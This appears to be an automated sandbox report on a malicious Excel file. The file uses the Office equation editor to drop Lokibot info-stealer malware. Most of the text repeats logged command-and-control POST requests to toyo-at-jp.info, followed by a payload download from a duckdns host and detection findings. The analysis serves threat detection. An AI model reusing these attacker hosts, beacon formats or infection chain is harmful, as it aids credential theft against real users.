Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Source: global trafficHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 147Connection: close
Contains functionality to download additional files from the internetShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_00404ED4 recv,4_2_00404ED4
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82C240C7.emfJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /russdoc/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: russchine2wsdyspecial6plumbingjkmaterial.duckdns.orgConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: russchine2wsdyspecial6plumbingjkmaterial.duckdns.org
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /ig1/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: toyo-at-jp.infoAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4AAE78FAContent-Length: 174Connection: close
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Thu, 16 Apr 2020 08:44:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.6.40Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Urls found in memory or binary dataShow sources
Source: vbc.exe, 00000004.00000002.1388312302.0049F000.00000004.00020000.sdmpString found in binary or memory: http://toyo-at-jp.info/ig1/fre.php
Source: vbc.exe, 00000004.00000002.1388284564.00415000.00000002.00020000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
Source: vbc.exe, 00000004.00000000.1042586835.004B9000.00000002.00020000.sdmp, regasm[1].exe.2.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: vbc.exe, 00000004.00000000.1042629409.004E0000.00000002.00020000.sdmp, regasm[1].exe.2.drString found in binary or memory: https://support.google.com/chrome/?p=usage_stats_crash_reports

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000004.00000003.1222647573.02A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: document is protected 15 16 17 18 " "" 19 . 20 21 22 w Open the document m If thrS document
Source: Screenshot number: 8Screenshot OCR: Enable Editing" from 26 protected documents the yellow bar above 27 28 29 30 31 . D 32 33
Source: Screenshot number: 8Screenshot OCR: protected documents the yellow bar above 27 28 29 30 31 . D 32 33 34 35 36 + 500, 88px taj
Office equation editor drops PE fileShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\vbc.exeJump to dropped file
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BR42M2GZ\regasm[1].exeJump to dropped file
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_0040549C4_2_0040549C
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004029D44_2_004029D4
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A20064_2_004A2006
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004A20384_2_004A2038
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004AF2674_2_004AF267
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004AA2A84_2_004AA2A8
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004B57074_2_004B5707
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004B73D14_2_004B73D1
Document misses a certain OLE stream usually present in this Microsoft Office document typeShow sources
Source: 20200413_140639.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: String function: 00405B6F appears 41 times
PE file contains strange resourcesShow sources
Source: regasm[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\54.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
Yara signature matchShow sources
Source: 00000004.00000003.1222647573.02A40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@5/7@82/3
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,4_2_0040650A
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,4_2_0040434D
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$20200413_140639.xlsxJump to behavior
Creates mutexesShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\09E3E1D85CB65E97AFA24C0A
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFAED.tmpJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: 20200413_140639.xlsxVirustotal: Detection: 25%
Source: 20200413_140639.xlsxReversingLabs: Detection: 26%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
Source: unknownProcess created: C:\Windows\System32\mspaint.exe C:\Windows\system32\mspaint.exe -Embedding
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe' Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{926749fa-2615-4987-8845-c33e65f2b957}\InProcServer32Jump to behavior
Uses Rich Edit ControlsShow sources
Source: C:\Windows\System32\mspaint.exeFile opened: C:\Windows\system32\MSFTEDIT.DLLJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Document has a 'vbamacros' value indicative of goodwareShow sources
Source: 20200413_140639.xlsxInitial sample: OLE indicators vbamacros = False
Document has an 'encrypted' value indicative of goodwareShow sources
Source: 20200413_140639.xlsxInitial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeUnpacked PE file: 4.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.x:W;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeUnpacked PE file: 4.2.vbc.exe.400000.0.unpack
Yara detected aPLib compressed binaryShow sources
Source: Yara matchFile source: 00000004.00000002.1388284564.00415000.00000002.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1222647573.02A40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2328, type: MEMORY
Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004B033C LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,4_2_004B033C
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_00402AC0 push eax; ret 4_2_00402AD4
